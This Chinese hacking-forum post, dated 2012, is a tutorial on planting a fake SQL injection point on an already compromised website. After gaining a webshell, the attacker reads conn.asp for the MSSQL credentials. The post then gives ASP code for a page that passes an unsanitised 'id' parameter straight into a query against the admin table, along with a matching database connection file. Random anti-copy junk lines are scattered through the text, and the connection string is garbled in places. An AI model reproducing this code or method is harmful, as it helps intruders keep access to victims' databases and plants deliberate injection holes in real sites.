中国网络渗透测试联盟
标题:
自己构造注入点方便入侵
[打印本页]
作者:
admin
时间:
2012-9-13 17:27
标题:
自己构造注入点方便入侵
自己构造注入点方便入侵
$ | p- P- E: f
( j4 @+ x0 L; [+ w2 d+ N
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
( `. u! v; ~6 ^% G! j9 H
0 J3 m# T' U. T7 R+ E
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
6 l% e1 w' k$ y7 L5 \; t
5 R( H$ K' y- I$ V* K6 A1 U
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
# V9 l! c. d# D: y8 `; Q
$ v1 c! d% @* M0 N
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
! ]! r4 n5 c/ s
5 H1 x) u( \! {- H
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
6 j* I+ M1 c' I% [! |
! u! R4 D0 z0 h" ]8 z* Q# K( d; i
程序代码
+ r' l7 u. k6 d- [* I3 I9 p
<!--#include file="xx.asp"-->
$ ]- j+ ]7 y5 o1 ?+ v! `
<%
" V: J8 H) i* T9 ~
set rs=server.createobject("ADODB.recordset")
; `& G4 c( B$ d% h1 m
id = request("id")
4 v, i5 T: [8 T1 O+ R6 `
strSQL = "select * from admin where id=" & id
' e" C' F$ C1 ~ b6 B. V
rs.open strSQL,conn,1,3
- b2 o+ w! U2 L5 s* z- d5 ?& c
rs.close
7 e! `( ^* e# t+ ]0 x0 @. b
%>
* ^+ }* \" P; l# `; J
/ ? \6 g1 u/ Y& b0 w4 A0 d% ^
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
% @' J$ G% A! a- J+ I8 p
+ ? l4 o* Q+ K, k
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
7 f1 a7 d& a# y. B
, z j4 q. _ A4 s3 G2 R
然后就要构造一个连接数据库的文件了,代码如下:
2 t# o- h( f8 b# J0 @& F; M
程序代码
7 A/ P7 ~/ w$ s8 {7 Y) Z5 _/ D1 |
<%
( q& {' M9 J6 Z5 d8 b
strSQLServerName = "000.000.000.000" '服务器名称或地址
6 ~( n, r! N1 p ^+ z; k: y3 |
strSQLDBUserName = "sqlname" '数据库帐号
( v: j/ Z. X" ~( ~% L$ ?, q
strSQLDBPassword = "sqlpass" '数据库密码
2 V+ P; c( }! T1 t, q6 c, D
strSQLDBName = "sqldataname" '数据库名称
, G0 {4 p7 A; H. c
Set conn = Server.CreateObject("ADODB.Connection")
9 K" r9 B2 n7 p; c$ z
strCon = "
rovider=SQLOLEDB.1
ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "
assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
) a( |9 m$ B& u5 A8 j% c, t
conn.open strCon
8 n# R' ~/ w+ Z! T8 M7 |
%>
) n) @; Y4 b. x. _; J9 l) k
% T* [/ ]4 m" X# e& n
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
1 v8 S4 C7 ]1 @% H3 j2 E: R3 j; y
& M: f5 |. m$ |! }3 A6 y- c
就这样,正常情况下,就OK了,伪造成功……
, t2 G9 }: |' m2 K
% d# ]# o: |/ W! B; m/ l; B. h. h+ F
如果有什么问题可以提出来大家一起探讨解决。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2